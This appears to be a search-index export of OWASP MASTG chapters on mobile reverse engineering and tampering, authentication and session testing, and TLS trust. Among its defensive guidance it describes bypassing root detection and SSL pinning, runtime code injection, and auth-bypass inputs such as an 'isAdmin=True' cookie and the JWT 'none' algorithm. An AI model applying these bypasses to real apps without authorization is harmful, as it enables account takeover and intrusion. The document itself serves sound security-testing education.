Reverse engineering is an art, and describing its every facet would fill a whole library. The sheer range of techniques and specializations is mind-blowing: one can spend years working on a very specific and isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. Security testers are generalists; to be effective reverse engineers, they must filter through the vast amount of relevant information.
There is no generic reverse engineering process that always works. That said, we'll describe commonly used methods and tools later in this guide, and give examples of tackling the most common defenses.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#why-you-need-it","title":"Why You Need It","text":"Mobile security testing requires at least basic reverse engineering skills for several reasons:
1. To enable black-box testing of mobile apps. Modern apps often include controls that will hinder dynamic analysis. SSL pinning and end-to-end (E2E) encryption sometimes prevent you from intercepting or manipulating traffic with a proxy. Root detection could prevent the app from running on a rooted device, preventing you from using advanced testing tools. You must be able to deactivate these defenses.
2. To enhance static analysis in black-box security testing. In a black-box test, static analysis of the app bytecode or binary code helps you understand the internal logic of the app. It also allows you to identify flaws such as hardcoded credentials.
3. To assess resilience against reverse engineering. Apps that implement the software protection measures listed in the Mobile Application Security Verification Standard Anti-Reversing Controls (MASVS-R) should withstand reverse engineering to a certain degree. To verify the effectiveness of such controls, the tester may perform a resilience assessment as part of the general security test. For the resilience assessment, the tester assumes the role of the reverse engineer and attempts to bypass defenses.
Before we dive into the world of mobile app reversing, we have some good news and some bad news. Let's start with the good news:
Ultimately, the reverse engineer always wins.
This is particularly true in the mobile industry, where the reverse engineer has a natural advantage: the way mobile apps are deployed and sandboxed is by design more restrictive than the deployment and sandboxing of classical Desktop apps, so including the rootkit-like defensive mechanisms often found in Windows software (e.g., DRM systems) is simply not feasible. The openness of Android allows reverse engineers to make favorable changes to the operating system, aiding the reverse engineering process. iOS gives reverse engineers less control, but defensive options are also more limited.
The bad news is that dealing with multi-threaded anti-debugging controls, cryptographic white-boxes, stealthy anti-tampering features, and highly complex control flow transformations is not for the faint-hearted. The most effective software protection schemes are proprietary and won't be beaten with standard tweaks and tricks. Defeating them requires tedious manual analysis, coding, frustration and, depending on your personality, sleepless nights and strained relationships.
It's easy for beginners to get overwhelmed by the sheer scope of reversing. The best way to get started is to set up some basic tools (see the relevant sections in the Android and iOS reversing chapters) and start with simple reversing tasks and crackmes. You'll need to learn about the assembler/bytecode language, the operating system, obfuscations you encounter, and so on. Start with simple tasks and gradually level up to more difficult ones.
In the following section, we'll give an overview of the techniques most commonly used in mobile app security testing. In later chapters, we'll drill down into OS-specific details of both Android and iOS.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#basic-tampering-techniques","title":"Basic Tampering Techniques","text":""},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#binary-patching","title":"Binary Patching","text":"Patching is the process of changing the compiled app, e.g., changing code in binary executables, modifying Java bytecode, or tampering with resources. This process is known as modding in the mobile game hacking scene. Patches can be applied in many ways, including editing binary files in a hex editor and decompiling, editing, and re-assembling an app. We'll give detailed examples of useful patches in later chapters.
Keep in mind that modern mobile operating systems strictly enforce code signing, so running modified apps is not as straightforward as it used to be in desktop environments. Security experts had a much easier life in the 90s! Fortunately, patching is not very difficult if you work on your own device. You simply have to re-sign the app or disable the default code signature verification facilities to run modified code.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#code-injection","title":"Code Injection","text":"Code injection is a very powerful technique that allows you to explore and modify processes at runtime. Injection can be implemented in various ways, but you'll get by without knowing all the details thanks to freely available, well-documented tools that automate the process. These tools give you direct access to process memory and important structures such as live objects instantiated by the app. They come with many utility functions that are useful for resolving loaded libraries, hooking methods and native functions, and more. Process memory tampering is more difficult to detect than file patching, so it is the preferred method in most cases.
Substrate, Frida, and Xposed are the most widely used hooking and code injection frameworks in the mobile industry. The three frameworks differ in design philosophy and implementation details: Substrate and Xposed focus on code injection and/or hooking, while Frida aims to be a full-blown \"dynamic instrumentation framework\", incorporating code injection, language bindings, and an injectable JavaScript VM and console.
However, you can also instrument apps with Substrate by using it to inject Cycript, the programming environment (aka \"Cycript-to-JavaScript\" compiler) authored by Saurik of Cydia fame. To complicate things even more, Frida's authors also created a fork of Cycript called \"frida-cycript\". It replaces Cycript's runtime with a Frida-based runtime called Mj\u00f8lner. This enables Cycript to run on all the platforms and architectures maintained by frida-core (if you are confused at this point, don't worry). The release of frida-cycript was accompanied by a blog post by Frida's developer Ole titled \"Cycript on Steroids\", a title that Saurik wasn't very fond of.
We'll include examples of all three frameworks. We recommend starting with Frida because it is the most versatile of the three (for this reason, we'll also include more Frida details and examples). Notably, Frida can inject a JavaScript VM into a process on both Android and iOS, while Cycript injection with Substrate only works on iOS. Ultimately, however, you can of course achieve many of the same goals with either framework.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#static-and-dynamic-binary-analysis","title":"Static and Dynamic Binary Analysis","text":"Reverse engineering is the process of reconstructing the semantics of a compiled program's source code. In other words, you take the program apart, run it, simulate parts of it, and do other unspeakable things to it to understand what it does and how.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#using-disassemblers-and-decompilers","title":"Using Disassemblers and Decompilers","text":"Disassemblers and decompilers allow you to translate an app's binary code or bytecode back into a more or less understandable format. By using these tools on native binaries, you can obtain assembler code that matches the architecture the app was compiled for. Disassemblers convert machine code to assembly code which in turn is used by decompilers to generate equivalent high-level language code. Android Java apps can be disassembled to smali, which is an assembly language for the DEX format used by Dalvik, Android's Java VM. Smali assembly can also be quite easily decompiled back to equivalent Java code.
In theory, the mapping between assembly and machine code should be one-to-one, and therefore it may give the impression that disassembling is a simple task. But in practice, there are multiple pitfalls such as:
Similarly, decompilation is a very complicated process, involving many deterministic and heuristic based approaches. As a consequence, decompilation is usually not really accurate, but nevertheless very helpful in getting a quick understanding of the function being analyzed. The accuracy of decompilation depends on the amount of information available in the code being decompiled and the sophistication of the decompiler. In addition, many compilation and post-compilation tools introduce additional complexity to the compiled code in order to increase the difficulty of comprehension and/or even decompilation itself. Such code referred to as obfuscated code.
Over the past decades many tools have perfected the process of disassembly and decompilation, producing output with high fidelity. Advanced usage instructions for any of the available tools can often easily fill a book of their own. The best way to get started is to simply pick up a tool that fits your needs and budget and get a well-reviewed user guide. In this section, we will provide an introduction to some of those tools and in the subsequent \"Reverse Engineering and Tampering\" Android and iOS chapters we'll focus on the techniques themselves, especially those that are specific to the platform at hand.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"Obfuscation is the process of transforming code and data to make it more difficult to comprehend (and sometimes even difficult to disassemble). It is usually an integral part of the software protection scheme. Obfuscation isn't something that can be simply turned on or off, programs can be made incomprehensible, in whole or in part, in many ways and to different degrees.
Note: All presented techniques below will not stop someone with enough time and budget from reverse engineering your app. However, combining these techniques will make their job significantly harder. The aim is thus to discourage reverse engineers from performing further analysis and not making it worth the effort.
The following techniques can be used to obfuscate an application:
The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation is applied, symbol names remain meaningful and can easily be extracted from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example, an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique can be reversed during decompilation, but depending on the complexity and depth of the substitutions, reversing it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behavior but increases the overhead of the reverse engineering process.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#packing","title":"Packing","text":"Packing is a dynamic rewriting obfuscation technique which compresses or encrypts the original executable into data and dynamically recovers it during execution. Packing an executable changes the file signature in an attempt to avoid signature-based detection.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#debugging-and-tracing","title":"Debugging and Tracing","text":"In the traditional sense, debugging is the process of identifying and isolating problems in a program as part of the software development life cycle. The same tools used for debugging are valuable to reverse engineers even when identifying bugs is not the primary goal. Debuggers enable program suspension at any point during runtime, inspection of the process' internal state, and even register and memory modification. These abilities simplify program inspection.
Debugging usually means interactive debugging sessions in which a debugger is attached to the running process. In contrast, tracing refers to passive logging of information about the app's execution (such as API calls). Tracing can be done in several ways, including debugging APIs, function hooks, and Kernel tracing facilities. Again, we'll cover many of these techniques in the OS-specific \"Reverse Engineering and Tampering\" chapters.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#advanced-techniques","title":"Advanced Techniques","text":"For more complicated tasks, such as de-obfuscating heavily obfuscated binaries, you won't get far without automating certain parts of the analysis. For example, understanding and simplifying a complex control flow graph based on manual analysis in the disassembler would take you years (and most likely drive you mad long before you're done). Instead, you can augment your workflow with custom made tools. Fortunately, modern disassemblers come with scripting and extension APIs, and many useful extensions are available for popular disassemblers. There are also open source disassembling engines and binary analysis frameworks.
As always in hacking, the anything-goes rule applies: simply use whatever is most efficient. Every binary is different, and all reverse engineers have their own style. Often, the best way to achieve your goal is to combine approaches (such as emulator-based tracing and symbolic execution). To get started, pick a good disassembler and/or reverse engineering framework, then get comfortable with their particular features and extension APIs. Ultimately, the best way to get better is to get hands-on experience.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dynamic-binary-instrumentation","title":"Dynamic Binary Instrumentation","text":"Another useful approach for native binaries is dynamic binary instrumentations (DBI). Instrumentation frameworks such as Valgrind and PIN support fine-grained instruction-level tracing of single processes. This is accomplished by inserting dynamically generated code at runtime. Valgrind compiles fine on Android, and pre-built binaries are available for download.
The Valgrind README includes specific compilation instructions for Android.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#emulation-based-dynamic-analysis","title":"Emulation-based Dynamic Analysis","text":"Emulation is an imitation of a certain computer platform or program being executed in different platform or within another program. The software or hardware performing this imitation is called an emulator. Emulators provide a much cheaper alternative to an actual device, where a user can manipulate it without worrying about damaging the device. There are multiple emulators available for Android, but for iOS there are practically no viable emulators available. iOS only has a simulator, shipped within Xcode.
The difference between a simulator and an emulator often causes confusion and leads to use of the two terms interchangeably, but in reality they are different, specially for the iOS use case. An emulator mimics both the software and hardware environment of a targeted platform. On the other hand, a simulator only mimics the software environment.
QEMU based emulators for Android take into consideration the RAM, CPU, battery performance etc (hardware components) while running an application, but in an iOS simulator this hardware component behaviour is not taken into consideration at all. The iOS simulator even lacks the implementation of the iOS kernel, as a result if an application is using syscalls it cannot be executed in this simulator.
In simple words, an emulator is a much closer imitation of the targeted platform, while a simulator mimics only a part of it.
Running an app in the emulator gives you powerful ways to monitor and manipulate its environment. For some reverse engineering tasks, especially those that require low-level instruction tracing, emulation is the best (or only) choice. Unfortunately, this type of analysis is only viable for Android, because no free or open source emulator exists for iOS (the iOS simulator is not an emulator, and apps compiled for an iOS device don't run on it). The only iOS emulator available is a commercial SaaS solution - Corellium. We'll provide an overview of popular emulation-based analysis frameworks for Android in the \"Tampering and Reverse Engineering on Android\" chapter.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#custom-tooling-with-reverse-engineering-frameworks","title":"Custom Tooling with Reverse Engineering Frameworks","text":"Even though most professional GUI-based disassemblers feature scripting facilities and extensibility, they are simply not well-suited to solving particular problems. Reverse engineering frameworks allow you to perform and automate any kind of reversing task without depending on a heavy-weight GUI. Notably, most reversing frameworks are open source and/or available for free. Popular frameworks with support for mobile architectures include radare2 and Angr.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#example-program-analysis-with-symbolicconcolic-execution","title":"Example: Program Analysis with Symbolic/Concolic Execution","text":"In the late 2000s, testing based on symbolic execution has become a popular way to identify security vulnerabilities. Symbolic \"execution\" actually refers to the process of representing possible paths through a program as formulas in first-order logic. Satisfiability Modulo Theories (SMT) solvers are used to check the satisfiability of these formulas and provide solutions, including concrete values of the variables needed to reach a certain point of execution on the path corresponding to the solved formula.
In simple words, symbolic execution is mathematically analyzing a program without executing it. During analysis, each unknown input is represented as a mathematical variable (a symbolic value), and hence all the operations performed on these variables are recorded as a tree of operations (aka. AST (abstract syntax tree), from compiler theory). These ASTs can be translated into so-called constraints that will be interpreted by a SMT solver. In the end of this analysis, a final mathematical equation is obtained, in which the variables are the inputs whose values are not known. SMT solvers are special programs which solve these equations to give possible values for the input variables given a final state.
To illustrate this, imagine a function which takes one input (x
) and multiplies it by the value of a second input (y
). Finally, there is an if condition which checks if the value calculated is greater than the value of an external variable(z
), and returns \"success\" if true, else returns \"fail\". The equation for this operation will be (x * y) > z
.
If we want the function to always return \"success\" (final state), we can tell the SMT solver to calculate the values for x
and y
(input variables) which satisfy the corresponding equation. As is the case for global variables, their value can be changed from outside this function, which may lead to different outputs whenever this function is executed. This adds to additional complexity in determining correct solution.
Internally SMT solvers use various equation solving techniques to generate solution for such equations. Some of the techniques are very advanced and their discussion is beyond the scope of this book.
In a real world situation, the functions are much more complex than the above example. The increased complexity of the functions can pose significant challenges for classical symbolic execution. Some of the challenges are summarised below:
To overcome these challenges, typically, symbolic execution is combined with other techniques such as dynamic execution (also called concrete execution) to mitigate the path explosion problem specific to classical symbolic execution. This combination of concrete (actual) and symbolic execution is referred to as concolic execution\u00a0(the name concolic stems from concrete and symbolic), sometimes also called as dynamic symbolic execution.
To visualize this, in the above example, we can obtain the value of the external variable by performing further reverse engineering or by dynamically executing the program and feeding this information into our symbolic execution analysis. This extra information will reduce the complexity of our equations and may produce more accurate analysis results. Together with improved SMT solvers and current hardware speeds, concolic execution allows to explore paths in medium-size software modules (i.e., on the order of 10 KLOC).
In addition, symbolic execution also comes in handy for supporting de-obfuscation tasks, such as simplifying control flow graphs. For example, Jonathan Salwan and Romain Thomas have shown how to reverse engineer VM-based software protections using Dynamic Symbolic Execution [#salwan] (i.e., using a mix of actual execution traces, simulation, and symbolic execution).
In the Android section, you'll find a walkthrough for cracking a simple license check in an Android application using symbolic execution.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#references","title":"References","text":"Authentication and authorization problems are prevalent security vulnerabilities. In fact, they consistently rank second highest in the OWASP Top 10.
Most mobile apps implement some kind of user authentication. Even though part of the authentication and state management logic is performed by the backend service, authentication is such an integral part of most mobile app architectures that understanding its common implementations is important.
Since the basic concepts are identical on iOS and Android, we'll discuss prevalent authentication and authorization architectures and pitfalls in this generic guide. OS-specific authentication issues, such as local and biometric authentication, will be discussed in the respective OS-specific chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-assumptions","title":"General Assumptions","text":""},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#appropriate-authentication-is-in-place","title":"Appropriate Authentication is in Place","text":"Perform the following steps when testing authentication and authorization:
Authentication bypass vulnerabilities exist when authentication state is not consistently enforced on the server and when the client can tamper with the state. While the backend service is processing requests from the mobile client, it must consistently enforce authorization checks: verifying that the user is logged in and authorized every time a resource is requested.
Consider the following example from the OWASP Web Testing Guide. In the example, a web resource is accessed through a URL, and the authentication state is passed through a GET parameter:
http://www.site.com/page.asp?authenticated=no\n
The client can arbitrarily change the GET parameters sent with the request. Nothing prevents the client from simply changing the value of the authenticated
parameter to \"yes\", effectively bypassing authentication.
Although this is a simplistic example that you probably won't find in the wild, programmers sometimes rely on \"hidden\" client-side parameters, such as cookies, to maintain authentication state. They assume that these parameters can't be tampered with. Consider, for example, the following classic vulnerability in Nortel Contact Center Manager. The administrative web application of Nortel's appliance relied on the cookie \"isAdmin\" to determine whether the logged-in user should be granted administrative privileges. Consequently, it was possible to get admin access by simply setting the cookie value as follows:
isAdmin=True\n
Security experts used to recommend using session-based authentication and maintaining session data on the server only. This prevents any form of client-side tampering with the session state. However, the whole point of using stateless authentication instead of session-based authentication is to not have session state on the server. Instead, state is stored in client-side tokens and transmitted with every request. In this case, seeing client-side parameters such as isAdmin
is perfectly normal.
To prevent tampering cryptographic signatures are added to client-side tokens. Of course, things may go wrong, and popular implementations of stateless authentication have been vulnerable to attacks. For example, the signature verification of some JSON Web Token (JWT) implementations could be deactivated by setting the signature type to \"None\".
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices-for-passwords","title":"Best Practices for Passwords","text":"Password strength is a key concern when passwords are used for authentication. The password policy defines requirements to which end users should adhere. A password policy typically specifies password length, password complexity, and password topologies. A \"strong\" password policy makes manual or automated password cracking difficult or impossible. For further information please consult the OWASP Authentication Cheat Sheet.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-guidelines-on-testing-authentication","title":"General Guidelines on Testing Authentication","text":"There's no one-size-fits-all approach to authentication. When reviewing the authentication architecture of an app, you should first consider whether the authentication method(s) used are appropriate in the given context. Authentication can be based on one or more of the following:
The number of authentication procedures implemented by mobile apps depends on the sensitivity of the functions or accessed resources. Refer to industry best practices when reviewing authentication functions. Username/password authentication (combined with a reasonable password policy) is generally considered sufficient for apps that have a user login and aren't very sensitive. This form of authentication is used by most social media apps.
For sensitive apps, adding a second authentication factor is usually appropriate. This includes apps that provide access to very sensitive information (such as credit card numbers) or allow users to transfer funds. In some industries, these apps must also comply with certain standards. For example, financial apps have to ensure compliance with the Payment Card Industry Data Security Standard (PCI DSS), the Gramm Leach Bliley Act, and the Sarbanes-Oxley Act (SOX). Compliance considerations for the US health care sector include the Health Insurance Portability and Accountability Act (HIPAA) and the Patient Safety Rule.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-vs-stateless-authentication","title":"Stateful vs. Stateless Authentication","text":"You'll usually find that the mobile app uses HTTP as the transport layer. The HTTP protocol itself is stateless, so there must be a way to associate a user's subsequent HTTP requests with that user. Otherwise, the user's log in credentials would have to be sent with every request. Also, both the server and client need to keep track of user data (e.g., the user's privileges or role). This can be done in two different ways:
With stateful authentication, a unique session id is generated when the user logs in. In subsequent requests, this session ID serves as a reference to the user details stored on the server. The session ID is opaque; it doesn't contain any user data.
With stateless authentication, all user-identifying information is stored in a client-side token. The token can be passed to any server or micro service, eliminating the need to maintain session state on the server. Stateless authentication is often factored out to an authorization server, which produces, signs, and optionally encrypts the token upon user login.
Web applications commonly use stateful authentication with a random session ID that is stored in a client-side cookie. Although mobile apps sometimes use stateful sessions in a similar fashion, stateless token-based approaches are becoming popular for a variety of reasons:
As a mobile security tester, you should be familiar with both types of authentication.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-authentication","title":"Stateful Authentication","text":"Stateful (or \"session-based\") authentication is characterized by authentication records on both the client and server. The authentication flow is as follows:
When sessions are improperly managed, they are vulnerable to a variety of attacks that may compromise the session of a legitimate user, allowing the attacker to impersonate the user. This may result in lost data, compromised confidentiality, and illegitimate actions.
Best Practices:
Locate any server-side endpoints that provide sensitive information or functions and verify the consistent enforcement of authorization. The backend service must verify the user's session ID or token and make sure that the user has sufficient privileges to access the resource. If the session ID or token is missing or invalid, the request must be rejected.
Make sure that:
Authentication shouldn't be implemented from scratch but built on top of proven frameworks. Many popular frameworks provide ready-made authentication and session management functionality. If the app uses framework APIs for authentication, check the framework security documentation for best practices. Security guides for common frameworks are available at the following links:
A great resource for testing server-side authentication is the OWASP Web Testing Guide, specifically the Testing Authentication and Testing Session Management chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateless-authentication","title":"Stateless Authentication","text":"Token-based authentication is implemented by sending a signed token (verified by the server) with each HTTP request. The most commonly used token format is the JSON Web Token, defined in RFC7519. A JWT may encode the complete session state as a JSON object. Therefore, the server doesn't have to store any session data or authentication information.
JWT tokens consist of three Base64Url-encoded parts separated by dots. The Token structure is as follows:
base64UrlEncode(header).base64UrlEncode(payload).base64UrlEncode(signature)\n
The following example shows a Base64Url-encoded JSON Web Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpva\nG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n
The header typically consists of two parts: the token type, which is JWT, and the hashing algorithm being used to compute the signature. In the example above, the header decodes as follows:
{\"alg\":\"HS256\",\"typ\":\"JWT\"}\n
The second part of the token is the payload, which contains so-called claims. Claims are statements about an entity (typically, the user) and additional metadata. For example:
{\"sub\":\"1234567890\",\"name\":\"John Doe\",\"admin\":true}\n
The signature is created by applying the algorithm specified in the JWT header to the encoded header, encoded payload, and a secret value. For example, when using the HMAC SHA256 algorithm the signature is created in the following way:
HMACSHA256(base64UrlEncode(header) + \".\" + base64UrlEncode(payload), secret)\n
Note that the secret is shared between the authentication server and the backend service - the client does not know it. This proves that the token was obtained from a legitimate authentication service. It also prevents the client from tampering with the claims contained in the token.
Best Practices:
Verify that the implementation adheres to JWT best practices:
jti
(JWT ID) claim, which gives the JWT a unique identifier.aud
(audience) claim, which defines for which application the token is entitled.none
, indicating that \"the integrity of the token has already been verified\". Some libraries might treat tokens signed with the none
algorithm as if they were valid tokens with verified signatures, so the application will trust altered token claims.There are two different Burp Plugins that can help you for testing the vulnerabilities listed above:
Also, make sure to check out the OWASP JWT Cheat Sheet for additional information.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#oauth-20","title":"OAuth 2.0","text":"OAuth 2.0 is an authorization framework that enables third-party applications to obtain limited access to user accounts on remote HTTP services such as APIs and web-enabled applications.
Common uses for OAuth2 include:
According to OAuth 2.0, a mobile client seeking access to a user's resources must first ask the user to authenticate against an authentication server. With the users' approval, the authorization server then issues a token that allows the app to act on behalf of the user. Note that the OAuth2 specification doesn't define any particular kind of authentication or access token format.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#protocol-overview","title":"Protocol Overview","text":"OAuth 2.0 defines four roles:
Note: The API fulfills both the Resource Server and Authorization Server roles. Therefore, we will refer to both as the API.
Here is a more detailed explanation of the steps in the diagram:
In OAuth2, the user agent is the entity that performs the authentication. OAuth2 authentication can be performed either through an external user agent (e.g. Chrome or Safari) or in the app itself (e.g. through a WebView embedded into the app or an authentication library). None of the two modes is intrinsically \"better\" than the other. The choice depends on the app's specific use case and threat model.
External User Agent: Using an external user agent is the method of choice for apps that need to interact with social media accounts (Facebook, Twitter, etc.). Advantages of this method include:
On the negative side, there is no way to control the behavior of the browser (e.g. to activate certificate pinning).
Embedded User Agent: Using an embedded user agent is the method of choice for apps that need to operate within a closed ecosystem, for example to interact with corporate accounts. For example, consider a banking app that uses OAuth2 to retrieve an access token from the bank's authentication server, which is then used to access a number of micro services. In that case, credential phishing is not a viable scenario. It is likely preferable to keep the authentication process in the (hopefully) carefully secured banking app, instead of placing trust on external components.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices","title":"Best Practices","text":"For additional best practices and detailed information please refer to the following source documents:
Some of the best practices include but are not limited to:
Failing to destroy the server-side session is one of the most common logout functionality implementation errors. This error keeps the session or token alive, even after the user logs out of the application. An attacker who gets valid authentication information can continue to use it and hijack a user's account.
Many mobile apps don't automatically log users out. There can be various reasons, such as: because it is inconvenient for customers, or because of decisions made when implementing stateless authentication. The application should still have a logout function, and it should be implemented according to best practices, destroying all locally stored tokens or session identifiers.
If session information is stored on the server, it should be destroyed by sending a logout request to that server. In case of a high-risk application, tokens should be invalidated. Not removing tokens or session identifiers can result in unauthorized access to the application in case the tokens are leaked. Note that other sensitive types of information should be removed as well, as any information that is not properly cleared may be leaked later, for example during a device backup.
Here are different examples of session termination for proper server-side logout:
If access and refresh tokens are used with stateless authentication, they should be deleted from the mobile device. The refresh token should be invalidated on the server.
The OWASP Web Testing Guide (WSTG-SESS-06) includes a detailed explanation and more test cases.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#supplementary-authentication","title":"Supplementary Authentication","text":"Authentication schemes are sometimes supplemented by passive contextual authentication, which can incorporate:
Ideally, in such a system the user's context is compared to previously recorded data to identify anomalies that might indicate account abuse or potential fraud. This process is transparent to the user, but can become a powerful deterrent to attackers.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#two-factor-authentication","title":"Two-factor Authentication","text":"Two-factor authentication (2FA) is standard for apps that allow users to access sensitive functions and data. Common implementations use a password for the first factor and any of the following as the second factor:
Whatever option is used, it always must be enforced and verified on the server-side and never on client-side. Otherwise the 2FA can be easily bypassed within the app.
The 2FA can be performed at login or later in the user's session.
For example, after logging in to a banking app with a username and PIN, the user is authorized to perform non-sensitive tasks. Once the user attempts to execute a bank transfer, the second factor (\"step-up authentication\") must be presented.
Best Practices:
Although one-time passwords (OTP) sent via SMS are a common second factor for two-factor authentication, this method has its shortcomings. In 2016, NIST suggested: \"Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators.\". Below you will find a list of some related threats and suggestions to avoid successful attacks on SMS-OTP.
Threats:
You can find below several suggestions to reduce the likelihood of exploitation when using SMS for OTP:
SMS-OTP Research:
Another alternative and strong mechanisms to implement a second factor is transaction signing.
Transaction signing requires authentication of the user's approval of critical transactions. Asymmetric cryptography is the best way to implement transaction signing. The app will generate a public/private key pair when the user signs up, then registers the public key on the backend. The private key is securely stored in the KeyStore (Android) or KeyChain (iOS). To authorize a transaction, the backend sends the mobile app a push notification containing the transaction data. The user is then asked to confirm or deny the transaction. After confirmation, the user is prompted to unlock the Keychain (by entering the PIN or fingerprint), and the data is signed with user's private key. The signed transaction is then sent to the server, which verifies the signature with the user's public key.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#login-activity-and-device-blocking","title":"Login Activity and Device Blocking","text":"It is a best practice that apps should inform the user about all login activities within the app with the possibility of blocking certain devices. This can be broken down into various scenarios:
The developer can make use of specific meta-information and associate it to each different activity or event within the application. This will make it easier for the user to spot suspicious behavior and block the corresponding device. The meta-information may include:
The application can provide a list of activities history which will be updated after each sensitive activity within the application. The choice of which activities to audit needs to be done for each application based on the data it handles and the level of security risk the team is willing to have. Below is a list of common sensitive activities that are usually audited:
Paid content requires special care, and additional meta-information (e.g., operation cost, credit, etc.) might be used to ensure user's knowledge about the whole operation's parameters.
In addition, non-repudiation mechanisms should be applied to sensitive transactions (e.g. paid content access, given consent to Terms and Conditions clauses, etc.) in order to prove that a specific transaction was in fact performed (integrity) and by whom (authentication).
Lastly, it should be possible for the user to log out specific open sessions and in some cases it might be interesting to fully block certain devices using a device identifier.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/","title":"Mobile App Network Communication","text":"Practically every network-connected mobile app uses the Hypertext Transfer Protocol (HTTP) or HTTP over Transport Layer Security (TLS), HTTPS, to send and receive data to and from remote endpoints. Consequently, network-based attacks (such as packet sniffing and man-in-the-middle-attacks) are a problem. In this chapter we discuss potential vulnerabilities, testing techniques, and best practices concerning the network communication between mobile apps and their endpoints.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#secure-connections","title":"Secure Connections","text":"The time has long passed since it was reasonable to use cleartext HTTP alone and it's usually trivial to secure HTTP connections using HTTPS. HTTPS is essentially HTTP layered on top of another protocol known as Transport Layer Security (TLS). And TLS performs a handshake using public key cryptography and, when complete, creates a secure connection.
An HTTPS connection is considered secure because of three properties:
Certificate Authorities (CAs) are an integral part of a secure client server communication and they are predefined in the trust store of each operating system. For instance, on iOS there are more than 200 root certificates installed (see Apple documentation - Available trusted root certificates for Apple operating systems)
CAs can be added to the trust store, either manually by the user, by an MDM that manages the enterprise device or through malware. The question is then: \"can you trust all of those CAs and should your app rely on the default trust store?\". After all, there are well-known cases where certificate authorities have been compromised or tricked into issuing certificates to impostors. A detailed timeline of CA breaches and failures can be found at sslmate.com.
Both Android and iOS allow the user to install additional CAs or trust anchors.
An app may want to trust a custom set of CAs instead of the platform default. The most common reasons for this are:
Whenever the app connects to a server whose certificate is self-signed or unknown to the system, the secure connection will fail. This is typically the case for any non public CAs, for instance those issued by an organization such as a government, corporation, or education institution for their own use.
Both Android and iOS offer means to extend trust, i.e. include additional CAs so that the app trusts the system's built-in ones plus the custom ones.
However, remember that the device users are always able to include additional CAs. Therefore, depending on the threat model of the app it might be necessary to avoid trusting any certificates added to the user trust store or even go further and only trust a pre-defined specific certificate or set of certificates.
